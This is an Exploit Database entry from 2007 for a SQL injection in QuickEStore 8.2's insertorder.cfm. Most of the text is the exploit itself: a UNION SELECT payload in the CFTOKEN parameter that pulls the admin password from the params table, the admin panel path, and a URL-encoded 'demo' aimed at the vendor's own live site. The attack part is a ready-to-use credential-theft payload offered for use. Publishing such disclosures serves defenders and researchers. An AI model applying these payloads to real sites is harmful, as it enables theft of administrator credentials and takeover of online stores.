Exploit Database - Logo

QuickEStore 8.2 - 'insertorder.cfm' SQL Injection

EDB-ID: 4193 Author: meoconx Published: 2007-07-18
CVE: CVE-2007-3933 Type: Webapps Platform: PHP
Aliases: N/A Advisory/Source: N/A Tags: Vulnerability
E-DB Verified: Verified Exploit: Download Exploit Code Download / View Raw Vulnerable App: N/A
« Previous Exploit Next Exploit » 
author:meoconx[at]vnbrain.net
web application:QuickEStore
Main Page:www.quickestore.com
bug:

sql injection at insertorder.cfm?CFID=123&CFTOKEN=1'

exploit:

http://www.xxx.com/insertorder.cfm?CFID=123&CFTOKEN=1[sql query]

get admin password:
http://www.xxx.com/insertorder.cfm?CFID=123&CFTOKEN=1 union select 1,2,3,password,5,6,7,8,9,10,11,12 from params"having 1=1

link admin:http://www.xxx.com/admin/

demo(main site :D :D):
http://www.quickestore.com/ppec/insertorder.cfm?CFID=xx&CFTOKEN=1%20union%20select%201,2,3,4,password,6,7,8,9,10,11,12,13,14,15%20from%20params%22having%201=1

# milw0rm.com [2007-07-18]

Related Exploits

Trying to match CVEs (1): CVE-2007-3933
Trying to match OSVDBs (1): 36358
Other Possible E-DB Search Terms: QuickEStore 8.2,  QuickEStore
Date D V Title Author
2010-04-04Download Exploit Code Verified QuickEStore 6.1 - Backup Dumpindoushka
2009-12-29Download Exploit Code Verified QuickEStore 7.9 - SQL Injection / Full Path Disclosure Downloadindoushka
Menu